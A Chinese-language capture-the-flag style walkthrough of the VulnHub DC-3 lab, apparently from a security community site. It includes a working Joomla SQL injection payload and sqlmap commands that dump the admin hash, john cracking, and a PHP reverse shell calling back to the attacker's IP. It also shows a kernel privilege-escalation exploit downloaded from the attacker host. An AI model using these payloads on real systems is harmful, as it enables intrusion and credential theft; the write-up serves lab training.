<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    DC-3靶場實戰詳解

    VSole2023-02-15 10:42:44

    qaw由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,雷神眾測及文章作者不為此承擔任何責任。

    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。

    環境安裝

    前面安裝了老版本的DC-3幾次,nmap都掃描不到機器,后來琢磨了很久也找不到問題,然后我去官網重新下載了個就沒問題了。

    官網地址:https://www.vulnhub.com/entry/dc-32,312/

    KALI和DC-3都用NAT模式.

    DC-3需要多修改一些東西,把IDE里面的改成IDE 0:0

    都完成后開啟KALI與DC-3




    尋找Flag

    信息收集

    1.首先確認kali與DC-3所在網段

    ip add

    確認kali與DC-3所在網段為192.168.79.0/24網段

    2.查找DC-3 ip 可以使用nmap 或者 arp-scan

    方法一:
	arp-scan -l
方法二:
    nmap -sP 192.168.79.0/24

    最終可以確認

    kali :192.168.79.128

    DC-3 :192.168.79.131

    3.掃描DC-3開啟的服務

    nmap -v -A 192.168.79.131

    通過掃描可以發現 DC-3開啟了80端口 并且使用了Joomla! cms

    4.訪問網站192.168.79.131

    5.掃描敏感目錄看看

    我這里使用的是7kbscan-WebPathBrute.1.6.2用御劍也是一樣的


    找到后臺登錄網站。

    因為是常見的cms,所以我們直接掃Joomla! cms常見漏洞





    漏洞掃描

    1.安裝onlinetool

    地址 https://github.com/iceyhexman/onlinetools

    我們這里kali 192.168.79.128 安教程部署就可以了

    git clone https://github.com/iceyhexman/onlinetools.git
cd onlinetools
pip3 install -r requirements.txt
nohup python3 main.py &

    2.安裝完成后訪問 http://192.168.79.128:8000/

    3.使用里面cms漏洞掃描

    4.測試payload的有效性

    payload:
http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)

    確認payload有效

    5.既然是SQL注入漏洞 配合sqlmap 以及前面目錄爆破出來的后臺登錄網站,來登錄后臺

    我這里使用是sqlmap windows的版本

    python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbs

//*表示注入位置 
//查詢所有數據庫

    得到下面5個數據庫 既然是joomla! 那我們也順其自然的查詢joomladb 數據庫


    得到下面5個數據庫 既然是joomla! 那我們也順其自然的查詢joomladb 數據庫

    python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" --tables
//查joomladb 數據庫下面的表

    一共有8 90條 有一個# _users 看樣子里面就應該有相關后臺信息

    接下來查詢# _users表內的列名

    python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "# __users" --columns
//查詢# _users表內的列名

    都是一路y或者回車

    確定列名 賬號密碼一般為“username,password”

    獲得表中的賬號密碼

    python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "# __users" -C "username,password" --dump
//讀取指定字段內容

    獲得賬號密碼

    +----------+--------------------------------------------------------------+

    | username | password |

    +----------+--------------------------------------------------------------+

    | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |

    +----------+--------------------------------------------------------------+

    6.密碼為md5加密 可以使用kali內的john 解密

    創建文件
touch admin.txt   # 創建文件
vi admin.txt      # 編輯
john admin.txt    # 破解

ps:
  因為我以前破解過使用所以顯示這個
  	Using default input encoding: UTF-8
	Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
	No password hashes left to crack (see FAQ)
  這是以及破解過的意思
john --show admin.txt  # 查看admin.txt以前破解過的結果

    得到密碼為 :snoopy

    得到密碼為 :snoopy

    7.登錄后臺





    反彈shell


    通過對后臺的各種查詢,發現Extensions->Templates里面的模板可以執行PHP腳本

    隨便找都可以,里面路徑都有寫

    當系統沒有禁用proc_popen的時候,我們是可以借助proc_popen輕松反彈這樣的一個shell的。
$sock = fsockopen("192.168.79.128", "5555");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

    之后保存訪問http://192.168.79.131/index.php

    kali內使用nc 接受反彈的shell

    nc -lvvp 5555

    瀏覽器訪問http://192.168.79.131/index.php

    可以發現kali內接收到shell

    python -c "import pty;pty.spawn('/bin/bash')"
//使用python 弄交互式頁面

    發現權限不夠





    提權

    SUID啥的都不行,于是考慮系統漏洞提權

    cat /etc/*release		# 查看發行版信息


    cat /proc/version  # 查看內核版本的全部信息

    可以判斷為Ubuntu 16.04 LTS 內核為Linux 4.4.0-21

    查看kali本地漏洞庫里面的exp

    searchsploit Ubuntu 16.04

    對應版本的幾個都試了 發現 39772.txt可以

    查看exp

    cat /usr/share/exploitdb/exploits/linux/local/39772.txt

    寫了exp地址

    本地下載即可

    kali好像下載不了 我本地下載 然后拉到kali里面

    https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip


    開啟apache

    systemctl start apache2.service

    移動39772.zip到指定的apache的目錄下

    mv 39772.zip /var/www/html

    瀏覽器訪問 kali IP:192.168.79.128

    復制下載鏈接

    http://192.168.79.128/39772.zip

    回到前面的DC-3的shell中下載剛剛上傳的exp

    wget http://192.168.79.128/39772.zip

    解壓exp

    unzip 39772.zip			# 解壓39772.zip
cd 39772				# 進入39772
tar -xvf exploit.tar	# 解壓縮exploit.tar

    進入 ebpf_mapfd_doubleput_exploit 運行exp

    cd ebpf_mapfd_doubleput_exploit

    運行方法 前面kali里面 cat /usr/share/exploitdb/exploits/linux/local/39772.txt 文件內寫了

    運行compile.sh , doubleput即可

    ./compile.sh
./doubleput

    等一兩分鐘就可以了







    FLAG

    root目錄下有flag,獲得flag

    cd /root
cat the-flag.txt

    sqlmapdc-3
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Vulnhub靶機DC系列-DC3(joomla漏洞、sqlmap注入、john 解密)
    2023-04-10 09:40:50
    option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27單引號嘗試:存在sql注入sqlmap 走起!跑數據 格式有點問題。獲取到管理員加密后的密碼$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu使用john 來破解john pwd --wordlist=/usr/share/wordlist/rockyou.txt admin/snoopy 登錄后臺3x0:后臺篇在后臺查找一番發現 類似于模板的頁面可以利用模板的信息在結合上面的端口信息沒有ssh應該是從web端進入 webshell?就接著用了4x0:提權篇查看系統的內核版本啟動kali上的apache,把exp上傳到服務器把exp下載到靶機解壓exp授權腳本使用exp報錯不影響使用獲取到root權限5x0:flag獲得
    DC-3靶場實戰詳解
    2023-02-15 10:42:44
    雷神眾測-杭州亞運會官方指定安全眾測服務平臺
    安服工程師技能手冊詳細總結
    2023-01-04 09:26:34
    安服工程師技能手冊詳細總結
    冰蝎V4.0流量分析到攻防檢測
    2023-01-17 11:05:18
    0x01 前言最近在改寫 yso,覺得自己基礎太差了,想先閱讀一下 sqlmap、冰蝎以及一些其他工具的開發思路。0x03 冰蝎的使用與流量分析冰蝎的使用我們看冰蝎的客戶端界面,對于 shell 其實是沒有輸入密碼模塊的,其實在冰蝎當中 shell 是通過傳輸協議配置的。這一傳輸協議的加密函數是用 Java 寫的,并且 key 是默認的,不需要自己修改,我們點擊生成服務端,則會生成三個 shell 文件,分別為?這種加密方式的攻防性),代碼如下,此處代碼和 v3.0 的相當不一樣。
    CTF—流量分析題型整理總結
    2021-10-13 06:38:17
    我見過的流量分析類型的題目總結: 一,ping 報文信息? 二,上傳/下載文件 三,sql注入攻擊 四,訪問特定的加密解密網站 五,后臺掃描+弱密碼爆破+菜刀 六,usb流量分析 七,WiFi無線密碼破解 八,根據一組流量包了解黑客的具體行為例題:一,ping 報文信息?如果是菜刀下載文件的流量,需要刪除分組字節流前開頭和結尾的X@Y字符,否則下載的文件會出錯。
    sqlmap腳本tamper使用
    2022-06-25 07:07:48
    所以有的時候我們會發現,注入成功了但是dump不出數據,很可能是select被過濾了等等原因。如何判斷使用哪個腳本最簡單的辦法就是在url參數中手工帶入關鍵詞,判斷是否被過濾。空格、等于號都沒有過濾,成功報錯。以此類推,當sqlmap注入出現問題時,比如不出數據,就要檢查對應的關鍵詞是否被過濾。
    SQLMAP-Tamper之較為通用的雙寫繞過
    2022-03-15 16:14:23
    前言21年省決賽的SQLITE注入就是用的雙寫繞過,當時是手搓代碼打的,這幾天想起來了,尋思著寫個tamper試試。一開始以為很簡單,后來才發現有很多要注意的點,折磨了挺久。等弄完才明白為什么sqlmap沒有自帶雙寫的tamper,涉及的情況太多,需要根據具體過濾邏輯來寫代碼,沒法做到統一。好,然后就是腳本的完整代碼#!
    sqlmap --os-shell反制小思路
    2021-12-14 16:55:46
    之前有看到goby反制和松鼠A師傅蟻劍反制的文章,再想到之前寫過sqlmap的shell免殺,覺得思路其實差不多,就寫一篇sqlmap的反制吧。
    sqlmap --os-shell原理
    2021-09-24 07:04:41
    前言當數據庫為MySQL,PostgreSQL或Microsoft SQL Server,并且當前用戶有權限使用特定的函數。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类